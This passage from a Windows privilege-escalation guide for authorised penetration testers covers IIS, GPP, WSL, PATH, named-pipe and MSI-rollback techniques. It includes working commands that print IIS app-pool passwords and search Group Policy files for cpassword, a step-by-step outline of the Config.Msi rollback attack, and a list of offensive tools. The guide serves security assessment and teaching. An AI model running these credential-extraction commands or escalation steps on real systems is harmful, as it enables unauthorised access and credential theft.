Verify how the installed client stores loaded keys rather than assuming the historical registry technique applies. 2578 2579 ### IIS AppCmd 2580 2581 If IIS is present and the current token is elevated, AppCmd may reveal application-pool or virtual-directory credentials: 2582 2583 ```batch 2584 %SystemRoot%\System32\inetsrv\appcmd.exe list apppools /text:name 2585 %SystemRoot%\System32\inetsrv\appcmd.exe list apppool "<pool>" /text:processModel.userName 2586 %SystemRoot%\System32\inetsrv\appcmd.exe list apppool "<pool>" /text:processModel.password 2587 %SystemRoot%\System32\inetsrv\appcmd.exe list vdir /text:vdir.name 2588 ``` 2589 2590 ### Cached Group Policy Preferences 2591 2592 Search local Group Policy history and domain SYSVOL for preference XML containing `cpassword`: 2593 2594 ```powershell 2595 Get-ChildItem 'C:\ProgramData\Microsoft\Group Policy\History' -Recurse -File -ErrorAction SilentlyContinue | 2596 Where-Object Name -in 'Groups.xml','Services.xml','ScheduledTasks.xml','DataSources.xml','Printers.xml','Drives.xml' | 2597 Select-String -Pattern 'cpassword' 2598 ``` 2599 2600 The historical GPP AES key is public, so any discovered `cpassword` must be treated as compromised even if the preference is no longer actively deployed. 2601 2602 ## 9.9 WSL, PATH, and Application-Specific Search Paths 2603 2604 ### WSL inventory 2605 2606 ```batch 2607 wsl.exe --status 2608 wsl.exe --list --verbose 2609 wsl.exe --list --online 2610 ``` 2611 2612 For each installed distribution, establish the default user and inspect mounted Windows paths. Root inside a WSL distribution is not automatically Windows SYSTEM, but exposed Windows files, credentials, sockets, interop, and permissive mounts can create crossover paths. Do not use legacy launcher commands such as `distribution.exe config --default-user root` without confirming the installed distribution and engagement scope. 2613 2614 ### Writable PATH entries 2615 2616 ```batch 2617 for %A in ("%PATH:;=" "%") do @icacls "%~A" 2>nul 2618 ``` 2619 2620 For every writable PATH directory, prove that a privileged process searches it for a missing DLL or executable. A writable directory alone is a lead, not a finding. 2621 2622 ### Plugin and extension autoload 2623 2624 Portable or copied applications may place plugin directories under user-writable paths. Notepad++, IDEs, browsers, database clients, and monitoring agents are common examples. Identify exact autoload rules, confirm the directory ACL, and establish whether a higher-privileged user or process launches the application. 2625 2626 ## 9.10 Handles, Pipes, and Local IPC 2627 2628 ### Inherited or leaked handles 2629 2630 A low-privileged child process may inherit a handle to a privileged process, thread, token, file, or registry key if the parent marked it inheritable and created the child with handle inheritance enabled. Enumerate handle type and granted access; a handle is useful only if its access mask supports a meaningful operation. 2631 2632 High-risk examples include: 2633 2634 - process handles with VM write, thread creation, or duplication rights; 2635 - token handles with duplicate, assign-primary, or impersonate rights; 2636 - writable handles to protected files or registry keys; 2637 - section handles mapping sensitive shared memory. 2638 2639 ### Named-pipe client impersonation 2640 2641 If the current token holds `SeImpersonatePrivilege`, a controllable pipe server may impersonate a privileged client after that client connects and writes. The hard part is coercing the privileged client to an attacker-chosen pipe and obtaining an impersonation level that permits token duplication. 2642 2643 ```batch 2644 whoami /priv 2645 pipelist.exe /accepteula 2646 ``` 2647 2648 Use PipeViewer or equivalent tooling to map owners, permissions, server processes, and client behavior. A visible pipe name alone is not an escalation path. 2649 2650 ### Telephony `tapsrv` research 2651 2652 The Telephony service's `\\pipe\\tapsrv` MS-TRP interface has been used in research chains where an authenticated client converted asynchronous event handling into a controlled DWORD write to an existing path writable by `NETWORK SERVICE`, modified Telephony administration state, and then loaded a provider UI DLL. Treat this as a version-specific protocol-research lead: verify the affected build and reproduce in a snapshot before testing any production host. 2653 2654 ## 9.11 File-System Redirection and Windows Installer Rollback 2655 2656 Windows local escalation research frequently turns a limited privileged file primitive into a stronger one by combining: 2657 2658 - NTFS junctions or mount points; 2659 - Object Manager symbolic links, often through `\RPC Control`; 2660 - opportunistic locks to pause a privileged operation; 2661 - Windows Installer rollback files in `C:\Config.Msi`; 2662 - an attacker-retained handle whose granted access survives later ACL changes. 2663 2664 ### MSI rollback concept 2665 2666 At a high level, the `Config.Msi` technique: 2667 2668 1. forces Windows Installer to create rollback files; 2669 2. pauses the installer at a deterministic point; 2670 3. uses an arbitrary folder-delete primitive to remove `C:\Config.Msi`; 2671 4. recreates it with attacker-controlled permissions; 2672 5. retains a handle while the installer restores restrictive ACLs; 2673 6. substitutes rollback script/data files; 2674 7. causes SYSTEM to restore attacker-controlled content into a protected location. 2675 2676 If the available primitive deletes only files, researchers have targeted the directory's `::$INDEX_ALLOCATION` stream so the operation removes the directory metadata. If the primitive deletes only the contents of an attacker-controlled folder, an oplock plus junction and Object Manager link may redirect the deletion to that stream. 2677 2678 This is a lab technique with a real risk of corrupting Windows Installer state or protected files. Snapshot the VM first, instrument every path resolution with Procmon, and use a harmless protected destination for validation. 2679 2680 ### Privileged log and export paths 2681 2682 When a SYSTEM service reads a writable configuration value for a log, report, or export destination, test whether junctions and Object Manager links can redirect the final open to another file. Confirm: 2683 2684 - the configuration is writable by the current user; 2685 - the service opens the path with a mode that overwrites or creates content; 2686 - path canonicalization occurs before or after impersonation; 2687 - the target file is opened by the privileged service, not by a broker running as the user. 2688 2689 Avoid destructive proof targets such as boot-critical drivers. Demonstrate the primitive against a disposable protected file agreed in the rules of engagement. 2690 2691 ## 9.12 Fast Triage Checklist 2692 2693 ```text 2694 [ ] Exact Windows edition, build, architecture, and hotfixes 2695 [ ] Current identity, integrity level, token privileges, and groups 2696 [ ] Defender/EDR, PowerShell logging, audit policy, and WEF 2697 [ ] Services: ACLs, binary/parent ACLs, registry ACLs, triggers, failures 2698 [ ] Scheduled tasks, autoruns, COM registrations, plugins, and updaters 2699 [ ] Loopback TCP/UDP listeners and named-pipe/RPC endpoints 2700 [ ] Installed product and driver versions matched to advisories 2701 [ ] Writable PATH, DLL search, Node/Electron module, and plugin paths 2702 [ ] WSUS URL, enablement, proxy, and certificate-trust configuration 2703 [ ] Credential Manager, PasswordVault, DPAPI, history, configs, cloud CLIs 2704 [ ] WSL distributions, mounts, interop, and exposed Windows credentials 2705 [ ] Inherited handles and privileged client connections to controllable pipes 2706 [ ] Any delete/move/create/write primitive mapped to a safe proof target 2707 ``` 2708 2709 --- 2710 2711 ## References and Tools 2712 2713 | Resource | URL | 2714 |----------|-----| 2715 | WinPEAS | https://github.com/carlospolop/PEASS-ng | 2716 | Seatbelt | https://github.com/GhostPack/Seatbelt | 2717 | SharpUp | https://github.com/GhostPack/SharpUp | 2718 | PowerUp | https://github.com/PowerShellMafia/PowerSploit | 2719 | PrivescCheck | https://github.com/itm4n/PrivescCheck | 2720 | PrintSpoofer | https://github.com/itm4n/PrintSpoofer | 2721 | GodPotato | https://github.com/BeichenDream/GodPotato | 2722 | Mimikatz | https://github.com/gentilkiwi/mimikatz | 2723 | Impacket | https://github.com/SecureAuthCorp/impacket | 2724 | LaZagne | https://github.com/AlessandroZ/LaZagne | 2725 | SessionGopher | https://github.com/Arvanaghi/SessionGopher | 2726 | Watson | https://github.com/rasta-mouse/Watson | 2727 | LOLBins | https://lolbas-project.github.io | 2728 | HackTricks Windows | https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation | 2729 | PayloadsAllTheThings | https://github.com/swisskyrepo/PayloadsAllTheThings | 2730 | MDSec RegPwn research | https://www.mdsec.co.uk/2026/03/rip-regpwn/ | 2731 | ZDI Node.js module resolution research | https://www.thezdi.com/blog/2026/4/8/nodejs-trust-falls-dangerous-module-resolution-on-windows | 2732 | Microsoft: Controlling Device Namespace Access | https://learn.microsoft.com/windows-hardware/drivers/kernel/controlling-device-namespace-access | 2733 | Microsoft: Service Trigger Events | https://learn.microsoft.com/windows/win32/services/service-trigger-events | 2734 | Microsoft: PowerShell Logging | https://learn.microsoft.com/powershell/module/microsoft.powershell.core/about/about_logging_windows | 2735 | Microsoft: Windows LAPS | https://learn.microsoft.com/windows-server/identity/laps/laps-overview | 2736 | Microsoft: Vulnerable Driver Blocklist | https://learn.microsoft.com/windows/security/application-security/application-control/windows-defender-application-control/design/microsoft-recommended-driver-block-rules | 2737 | GoSecure: WSUS CVE-2020-1013 | https://gosecure.ai/blog/2020/09/03/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-0-day/ | 2738 | ZDI: Filesystem EoP techniques | https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks | 2739 2740 --- 2741 2742 *This guide represents the state of Windows privilege escalation techniques as of September 2026. Always verify techniques in a controlled environment before use in production assessments. Ensure proper authorization before testing any systems.*